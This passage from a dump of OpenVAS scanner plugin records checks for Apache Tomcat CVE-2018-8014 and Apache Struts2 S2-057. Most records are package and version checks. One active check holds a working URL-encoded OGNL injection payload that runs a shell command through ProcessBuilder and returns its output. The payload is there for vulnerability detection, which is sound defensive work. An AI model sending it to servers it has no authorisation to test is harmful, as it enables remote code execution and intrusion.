"AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-02-20T18:49:30", "description": "The remote host is missing an update for the Huawei EulerOS\n ", "cvss3": {}, "published": "2020-01-23T00:00:00", "type": "openvas", "title": "Huawei EulerOS: Security Advisory for tomcat (EulerOS-SA-2018-1220)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-8014"], "modified": "2020-02-18T00:00:00", "id": "OPENVAS:1361412562311220181220", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562311220181220", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.1.2.2018.1220\");\n script_version(\"2020-02-18T11:13:49+0000\");\n script_cve_id(\"CVE-2018-8014\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-02-18 11:13:49 +0000 (Tue, 18 Feb 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-23 11:17:54 +0000 (Thu, 23 Jan 2020)\");\n script_name(\"Huawei EulerOS: Security Advisory for tomcat (EulerOS-SA-2018-1220)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei EulerOS Local Security Checks\");\n script_dependencies(\"gb_huawei_euleros_consolidation.nasl\");\n script_mandatory_keys(\"ssh/login/euleros\", \"ssh/login/rpms\", re:\"ssh/login/release=EULEROS-2\\.0SP2\");\n\n script_xref(name:\"EulerOS-SA\", value:\"2018-1220\");\n script_xref(name:\"URL\", value:\"https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2018-1220\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the Huawei EulerOS\n 'tomcat' package(s) announced via the EulerOS-SA-2018-1220 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The defaults settings for the CORS filter provided in Apache Tomcat 9.0.0.M1 to 9.0.8, 8.5.0 to 8.5.31, 8.0.0.RC1 to 8.0.52, 7.0.41 to 7.0.88 are insecure and enable 'supportsCredentials' for all origins. It is expected that users of the CORS filter will have configured it appropriately for their environment rather than using it in the default configuration. Therefore, it is expected that most users will not be impacted by this issue.(CVE-2018-8014)\");\n\n script_tag(name:\"affected\", value:\"'tomcat' package(s) on Huawei EulerOS V2.0SP2.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"EULEROS-2.0SP2\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"tomcat\", rpm:\"tomcat~7.0.76~3.h1\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"tomcat-admin-webapps\", rpm:\"tomcat-admin-webapps~7.0.76~3.h1\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"tomcat-el-2.2-api\", rpm:\"tomcat-el-2.2-api~7.0.76~3.h1\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"tomcat-jsp-2.2-api\", rpm:\"tomcat-jsp-2.2-api~7.0.76~3.h1\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"tomcat-lib\", rpm:\"tomcat-lib~7.0.76~3.h1\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"tomcat-servlet-3.0-api\", rpm:\"tomcat-servlet-3.0-api~7.0.76~3.h1\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"tomcat-webapps\", rpm:\"tomcat-webapps~7.0.76~3.h1\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-06-09T17:44:50", "description": "It is possible to perform a RCE attack when alwaysSelectFullNamespace is true (either by user or a plugin like Convention Plugin) and then namespace value isn", "cvss3": {}, "published": "2020-06-05T00:00:00", "type": "openvas", "title": "Huawei Data Communication: Apache Struts2 S2-057 Remote Code Execution Vulnerability in Some Huawei Products (huawei-sa-20181121-01-struts2)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-11776"], "modified": "2020-06-06T00:00:00", "id": "OPENVAS:1361412562310108792", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310108792", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.108792\");\n script_version(\"2020-06-06T12:09:29+0000\");\n script_tag(name:\"last_modification\", value:\"2020-06-06 12:09:29 +0000 (Sat, 06 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-06-05 08:17:40 +0000 (Fri, 05 Jun 2020)\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n\n script_cve_id(\"CVE-2018-11776\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_name(\"Huawei Data Communication: Apache Struts2 S2-057 Remote Code Execution Vulnerability in Some Huawei Products (huawei-sa-20181121-01-struts2)\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei\");\n script_dependencies(\"gb_huawei_vrp_network_device_consolidation.nasl\");\n script_mandatory_keys(\"huawei/vrp/detected\");\n\n script_tag(name:\"summary\", value:\"It is possible to perform a RCE attack when alwaysSelectFullNamespace is true (either by user or a plugin like Convention Plugin) and then namespace value isn't set for a result defined in underlying configurations and in same time, its upper package configuration have no or wildcard namespace and same possibility when using url tag which doesn't have value and action set and in same time, its upper package configuration have no or wildcard namespace.\");\n\n script_tag(name:\"insight\", value:\"It is possible to perform a RCE attack when alwaysSelectFullNamespace is true (either by user or a plugin like Convention Plugin) and then namespace value isn't set for a result defined in underlying configurations and in same time, its upper package configuration have no or wildcard namespace and same possibility when using url tag which doesn't have value and action set and in same time, its upper package configuration have no or wildcard namespace. (Vulnerability ID: HWPSIRT-2018-08200)This vulnerability has been assigned a Common Vulnerabilities and Exposures (CVE) ID: CVE-2018-11776.Huawei has released software updates to fix this vulnerability. This advisory is available in the linked references.\");\n\n script_tag(name:\"impact\", value:\"Attackers can exploit this vulnerability to perform a remote code execution attack\");\n\n script_tag(name:\"affected\", value:\"Seco VSM versions V200R002C00\n\neLog versions V200R005C00 V200R006C10 V200R007C00SPC100\");\n\n script_tag(name:\"solution\", value:\"See the referenced vendor advisory for a solution.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_xref(name:\"URL\", value:\"https://www.huawei.com/en/psirt/security-advisories/huawei-sa-20181121-01-struts2-en\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\n# nb: Unknown device (no VRP), no public vendor advisory or general inconsistent / broken data\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-02-20T18:49:31", "description": "The remote host is missing an update for the Huawei EulerOS\n ", "cvss3": {}, "published": "2020-01-23T00:00:00", "type": "openvas", "title": "Huawei EulerOS: Security Advisory for tomcat (EulerOS-SA-2018-1227)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-8014"], "modified": "2020-02-18T00:00:00", "id": "OPENVAS:1361412562311220181227", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562311220181227", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.1.2.2018.1227\");\n script_version(\"2020-02-18T11:13:49+0000\");\n script_cve_id(\"CVE-2018-8014\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-02-18 11:13:49 +0000 (Tue, 18 Feb 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-23 11:18:04 +0000 (Thu, 23 Jan 2020)\");\n script_name(\"Huawei EulerOS: Security Advisory for tomcat (EulerOS-SA-2018-1227)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei EulerOS Local Security Checks\");\n script_dependencies(\"gb_huawei_euleros_consolidation.nasl\");\n script_mandatory_keys(\"ssh/login/euleros\", \"ssh/login/rpms\", re:\"ssh/login/release=EULEROS-2\\.0SP3\");\n\n script_xref(name:\"EulerOS-SA\", value:\"2018-1227\");\n script_xref(name:\"URL\", value:\"https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2018-1227\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the Huawei EulerOS\n 'tomcat' package(s) announced via the EulerOS-SA-2018-1227 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The defaults settings for the CORS filter provided in Apache Tomcat 9.0.0.M1 to 9.0.8, 8.5.0 to 8.5.31, 8.0.0.RC1 to 8.0.52, 7.0.41 to 7.0.88 are insecure and enable 'supportsCredentials' for all origins. It is expected that users of the CORS filter will have configured it appropriately for their environment rather than using it in the default configuration. Therefore, it is expected that most users will not be impacted by this issue.(CVE-2018-8014)\");\n\n script_tag(name:\"affected\", value:\"'tomcat' package(s) on Huawei EulerOS V2.0SP3.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"EULEROS-2.0SP3\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"tomcat\", rpm:\"tomcat~7.0.76~3.h1\", rls:\"EULEROS-2.0SP3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"tomcat-admin-webapps\", rpm:\"tomcat-admin-webapps~7.0.76~3.h1\", rls:\"EULEROS-2.0SP3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"tomcat-el-2.2-api\", rpm:\"tomcat-el-2.2-api~7.0.76~3.h1\", rls:\"EULEROS-2.0SP3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"tomcat-jsp-2.2-api\", rpm:\"tomcat-jsp-2.2-api~7.0.76~3.h1\", rls:\"EULEROS-2.0SP3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"tomcat-lib\", rpm:\"tomcat-lib~7.0.76~3.h1\", rls:\"EULEROS-2.0SP3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"tomcat-servlet-3.0-api\", rpm:\"tomcat-servlet-3.0-api~7.0.76~3.h1\", rls:\"EULEROS-2.0SP3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"tomcat-webapps\", rpm:\"tomcat-webapps~7.0.76~3.h1\", rls:\"EULEROS-2.0SP3\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-07-25T11:52:43", "description": "This host is installed with Apache Tomcat\n and is prone to a security bypass vulnerability.", "cvss3": {}, "published": "2018-05-22T00:00:00", "type": "openvas", "title": "Apache Tomcat 'CORS Filter' Setting Security Bypass Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-8014"], "modified": "2019-07-24T00:00:00", "id": "OPENVAS:1361412562310813378", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310813378", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Apache Tomcat 'CORS Filter' Setting Security Bypass Vulnerability\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:apache:tomcat\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.813378\");\n script_version(\"2019-07-24T08:39:52+0000\");\n script_cve_id(\"CVE-2018-8014\");\n script_bugtraq_id(104203);\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-07-24 08:39:52 +0000 (Wed, 24 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-05-22 12:31:15 +0530 (Tue, 22 May 2018)\");\n script_name(\"Apache Tomcat 'CORS Filter' Setting Security Bypass Vulnerability\");\n\n ## It can reasult in FP if users of the CORS filter will have configured it appropriately\n ## for their environment rather than using it in the default configuration\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Apache Tomcat\n and is prone to a security bypass vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaw exist because defaults settings\n for the CORS filter provided in Apache Tomcat are insecure and enable\n 'supportsCredentials' for all origins.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to bypass certain security restrictions and perform unauthorized\n actions. This may aid in further attacks.\");\n\n script_tag(name:\"affected\", value:\"Apache Tomcat versions 9.0.0.M1 to 9.0.8\n Apache Tomcat versions 8.5.0 to 8.5.31\n Apache Tomcat versions 8.0.0.RC1 to 8.0.52\n Apache Tomcat versions 7.0.41 to 7.0.88\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Apache Tomcat version 9.0.9,\n 8.0.53, 7.0.89 or 8.5.32 or later. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"http://tomcat.apache.org/security-9.html\");\n script_xref(name:\"URL\", value:\"http://tomcat.apache.org/security-8.html\");\n script_xref(name:\"URL\", value:\"http://tomcat.apache.org/security-7.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Web Servers\");\n script_dependencies(\"gb_apache_tomcat_consolidation.nasl\");\n script_mandatory_keys(\"apache/tomcat/detected\");\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"revisions-lib.inc\");\ninclude(\"version_func.inc\");\n\nif(isnull(tomPort = get_app_port(cpe:CPE)))\n exit(0);\n\nif(!infos = get_app_version_and_location(cpe:CPE, port:tomPort, exit_no_version:TRUE))\n exit(0);\n\nappVer = infos['version'];\npath = infos['location'];\n\nif(appVer =~ \"^8\\.5\")\n{\n if(version_in_range(version:appVer, test_version: \"8.5.0\", test_version2: \"8.5.31\")){\n fix = \"8.5.32\";\n }\n}\nelse if(appVer =~ \"^7\\.0\")\n{\n if(version_in_range(version:appVer, test_version: \"7.0.41\", test_version2: \"7.0.88\")){\n fix = \"7.0.89\";\n }\n}\nelse if(appVer =~ \"^8\\.0\")\n{\n if((revcomp(a:appVer, b: \"8.0.0.RC1\") >= 0) && (revcomp(a:appVer, b: \"8.0.53\") < 0)){\n fix = \"8.0.53\";\n }\n}\nelse if(appVer =~ \"^9\\.0\")\n{\n if((revcomp(a:appVer, b: \"9.0.0.M1\") >= 0) && (revcomp(a:appVer, b: \"9.0.9\") < 0)){\n fix = \"9.0.9\";\n }\n}\n\nif(fix)\n{\n report = report_fixed_ver(installed_version:appVer, fixed_version:fix, install_path:path);\n security_message(port:tomPort, data: report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-05-08T10:31:11", "description": "This host is running Apache Struts and is prone to a remote code execution\nvulnerability.", "cvss3": {}, "published": "2018-08-27T00:00:00", "type": "openvas", "title": "Apache Struts2 Remote Code Execution Vulnerability (S2-057) (Active Check)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-5638", "CVE-2018-11776"], "modified": "2020-05-05T00:00:00", "id": "OPENVAS:1361412562310141398", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310141398", "sourceData": "##############################################################################\n# OpenVAS Vulnerability Test\n#\n# Apache Struts2 Remote Code Execution Vulnerability (S2-057) (Active Check)\n#\n# Authors:\n# Christian Kuersteiner <christian.kuersteiner@greenbone.net>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.141398\");\n script_version(\"2020-05-05T10:19:36+0000\");\n script_tag(name:\"last_modification\", value:\"2020-05-05 10:19:36 +0000 (Tue, 05 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2018-08-27 13:07:39 +0700 (Mon, 27 Aug 2018)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_cve_id(\"CVE-2017-5638\");\n\n script_tag(name:\"qod_type\", value:\"exploit\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_name(\"Apache Struts2 Remote Code Execution Vulnerability (S2-057) (Active Check)\");\n\n script_category(ACT_ATTACK);\n\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"find_service.nasl\", \"httpver.nasl\", \"webmirror.nasl\", \"DDI_Directory_Scanner.nasl\", \"os_detection.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_mandatory_keys(\"www/action_jsp_do\");\n\n script_tag(name:\"vuldetect\", value:\"Try to execute a command by sending a special crafted HTTP GET request.\");\n\n script_tag(name:\"summary\", value:\"This host is running Apache Struts and is prone to a remote code execution\nvulnerability.\");\n\n script_tag(name:\"insight\", value:\"The flaw exists due to errors in conditions when namespace value isn't set for\na result defined in underlying configurations and in same time, its upper action(s) configurations have no or\nwildcard namespace. Same possibility when using url tag which doesn't have value and action set and in same time,\nits upper action(s) configurations have no or wildcard namespace.\");\n\n script_tag(name:\"affected\", value:\"Apache Struts versions 2.3 through 2.3.34 and 2.5 through 2.5.16\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Apache Struts version 2.3.35 or 2.5.17 or later.\");\n\n script_xref(name:\"URL\", value:\"https://cwiki.apache.org/confluence/display/WW/S2-057\");\n script_xref(name:\"URL\", value:\"https://semmle.com/news/apache-struts-CVE-2018-11776\");\n script_xref(name:\"URL\", value:\"https://lgtm.com/blog/apache_struts_CVE-2018-11776\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\ninclude(\"misc_func.inc\");\n\nport = http_get_port(default: 80);\nhost = http_host_name(dont_add_port: TRUE);\n\nurls = make_list();\n\nexts = http_get_kb_file_extensions(port: port, host: host, ext: \"action\");\nif (exts && is_array(exts))\n urls = make_list(urls, exts);\n\ncmds = exploit_commands();\n\nforeach url (urls) {\n path = eregmatch(pattern: \"(.*/)([^.]+\\.action)\", string: url);\n if (isnull(path[2]))\n continue;\n\n action = path[2];\n dir = path[1];\n\n foreach cmd (keys(cmds)) {\n url_check = dir + \"%24%7B%28%23_memberAccess%5B%27allowStaticMethodAccess%27%5D%3Dtrue%29.\" +\n \"%28%23cmd%3D%27\" + cmds[cmd] + \"%27%29.%28%23iswin%3D%28%40\" +\n \"java.lang.System%40getProperty%28%27os.name%27%29.toLowerCase%28%29.contains%28%27\" +\n \"win%27%29%29%29.%28%23cmds%3D%28%23iswin%3F%7B%27cmd.exe%27%2C%27/c%27%2C%23cmd%7D%3A%7B\" +\n \"%27bash%27%2C%27-c%27%2C%23cmd%7D%29%29.%28%23p%3Dnew%20java.lang.ProcessBuilder\" +\n \"%28%23cmds%29%29.%28%23p.redirectErrorStream%28true%29%29.%28%23process%3D%23p.start\" +\n \"%28%29%29.%28%23ros%3D%28%40org.apache.struts2.ServletActionContext%40getResponse\" +\n \"%28%29.getOutputStream%28%29%29%29.%28%40org.apache.commons.io.IOUtils%40copy\" +\n \"%28%23process.getInputStream%28%29%2C%23ros%29%29.%28%23ros.flush%28%29%29%7D/\" + action;\n\n if (http_vuln_check(port: port, url: url_check, pattern: cmd, check_header: TRUE)) {\n report = http_report_vuln_url(port: port, url: url_check);\n security_message(port: port, data: report);\n exit(0);\n }\n }\n}\n\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-29T19:25:00", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2019-08-14T00:00:00", "type": "openvas", "title": "Debian LTS: Security Advisory for tomcat8 (DLA-1883-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-8014", "CVE-2016-5388", "CVE-2019-0221"], "modified": "2020-01-29T00:00:00", "id": "OPENVAS:1361412562310891883", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310891883", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.891883\");\n script_version(\"2020-01-29T08:22:52+0000\");\n script_cve_id(\"CVE-2016-5388\", \"CVE-2018-8014\", \"CVE-2019-0221\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-01-29 08:22:52 +0000 (Wed, 29 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2019-08-14 02:00:17 +0000 (Wed, 14 Aug 2019)\");\n script_name(\"Debian LTS: Security Advisory for tomcat8 (DLA-1883-1)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB8\");\n\n script_xref(name:\"URL\", value:\"https://lists.debian.org/debian-lts-announce/2019/08/msg00015.html\");\n script_xref(name:\"URL\", value:\"https://security-tracker.debian.org/tracker/DLA-1883-1\");\n script_xref(name:\"URL\", value:\"https://bugs.debian.org/929895\");\n script_xref(name:\"URL\", value:\"https://bugs.debian.org/898935\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'tomcat8'\n package(s) announced via the DLA-1883-1 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Several minor issues have been fixed in tomcat8, a Java Servlet and\nJSP engine.\n\nCVE-2016-5388\n\nApache Tomcat, when the CGI Servlet is enabled, follows RFC 3875\nsection 4.1.18 and therefore does not protect applications from\nthe presence of untrusted client data in the HTTP_PROXY\nenvironment variable, which might allow remote attackers to\nredirect an application's outbound HTTP traffic to an arbitrary\nproxy server via a crafted Proxy header in an HTTP request, aka an\n'httpoxy' issue. The 'cgi' servlet now has a 'envHttpHeaders'\nparameter to filter environment variables.\n\nCVE-2018-8014\n\nThe defaults settings for the CORS filter provided in Apache\nTomcat are insecure and enable 'supportsCredentials' for all\norigins. It is expected that users of the CORS filter will have\nconfigured it appropriately for their environment rather than\nusing it in the default configuration. Therefore, it is expected\nthat most users will not be impacted by this issue.\n\nCVE-2019-0221\n\nThe SSI printenv command in Apache Tomcat echoes user provided\ndata without escaping and is, therefore, vulnerable to XSS. SSI is\ndisabled by default. The printenv command is intended for\ndebugging and is unlikely to be present in a production website.\");\n\n script_tag(name:\"affected\", value:\"'tomcat8' package(s) on Debian Linux.\");\n\n script_tag(name:\"solution\", value:\"For Debian 8 'Jessie', these problems have been fixed in version\n8.0.14-1+deb8u15.\n\nWe recommend that you upgrade your tomcat8 packages.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif(!isnull(res = isdpkgvuln(pkg:\"libservlet3.1-java\", ver:\"8.0.14-1+deb8u15\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libservlet3.1-java-doc\", ver:\"8.0.14-1+deb8u15\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libtomcat8-java\", ver:\"8.0.14-1+deb8u15\", 